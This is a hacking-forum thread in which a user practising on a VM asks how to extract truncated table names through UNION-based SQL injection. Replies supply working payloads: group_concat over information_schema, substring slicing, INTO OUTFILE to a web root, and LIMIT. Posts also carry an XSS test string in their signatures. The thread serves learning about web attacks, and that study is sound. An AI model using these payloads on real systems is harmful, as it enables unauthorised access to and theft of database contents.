Author | SQL injection in limited space |
Thorin Member

Posts: 12 Location: India
Joined: 09.06.14 Rank: Uber Elite | |
This might seem like a noob question. I am currently trying SQL injection on a VM. This is what i am trying
Code union select group_concat(table_name) from information_schema.tables#
And the injection works. But the page that is returned is an xml file and each tag has a size limitation, so I can see only half of the results.
Code
<title>Bla Forum - Topic: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>
Is there a way to print the second half of the results. The table that i need to see contains the word "user". If I'm too ambiguous I want to do something along the lines of:
1. Arrange the rows of the result and then group_concat it
2. Slice the result (as in string[10:])
3. Select all the rows after tables_priv
_____________________________________________________________
What I already tried:
Code union select group_concat(table_name) from information_schema.tables where table_name regexp 'user'#
Nothing is printed out. But this query works when i directly try in the VM's mysql (after omitting the 'union' and the '#').
Code union select group_concat(table_name) from information_schema.tables where table_name like 'user'#
Didn't work on neither the web application nor directly in VM's mysql.
PS. I know sqlmap will do the job for me, but i want to try things manually.
<script>alert(1)</script> |
 |
Author | RE: SQL injection in limited space |
skeet Member

Posts: 11 Location:
Joined: 26.01.16 Rank: HBH Guru | |
If you know the current working directory or a directory you have access to try to put the output into a text file with
INTO OUTFILE '/path/where/you/can/read/write/query.txt' |
 |
Author | RE: SQL injection in limited space |
Thorin Member

Posts: 12 Location: India
Joined: 09.06.14 Rank: Uber Elite | |
I don't have access to the file system (from the hacker's perspective .. meaning no LFI vulnerabilities) ... Anyways i just solved the question. I used the following payload:
Code union select substring(group_concat(table_name),341,341) from information_schema.tables#;
<script>alert(1)</script> |
 |
Author | RE: SQL injection in limited space |
Thorin Member

Posts: 12 Location: India
Joined: 09.06.14 Rank: Uber Elite | |
skeet wrote:
If you know the current working directory or a directory you have access to try to put the output into a text file with
INTO OUTFILE '/path/where/you/can/read/write/query.txt'
Taking into consideration what you're saying. Since I don't have an LFI or directory traversal vulnerability, I can use SQL injection to read a particular file on the file system. So if I dump the output of the initial injection into a file and then read it using another sql injection, won't that lead me to the same place (size limitations). Won't work in this situation but certainly something to try on another machine 
<script>alert(1)</script> |
 |
Author | RE: SQL injection in limited space |
skeet Member

Posts: 11 Location:
Joined: 26.01.16 Rank: HBH Guru | |
Thorin wrote:
skeet wrote:
If you know the current working directory or a directory you have access to try to put the output into a text file with
INTO OUTFILE '/path/where/you/can/read/write/query.txt'
Taking into consideration what you're saying. Since I don't have an LFI or directory traversal vulnerability, I can use SQL injection to read a particular file on the file system. So if I dump the output of the initial injection into a file and then read it using another sql injection, won't that lead me to the same place (size limitations). Won't work in this situation but certainly something to try on another machine 
I was thinking more along the lines of executing the query with INTO OUTFILE '/var/www/html/results.txt' then just checking with your browser at http://www.whatever.com/results.txt Either way glad you solved your problem  |
 |
Author | RE: SQL injection in limited space |
Huitzilopochtli Member

Posts: 1624 Location:
Joined: 19.02.13 Rank: God | |
If there was no INTO OUTFILE available I'd just have used LIMIT. |
 |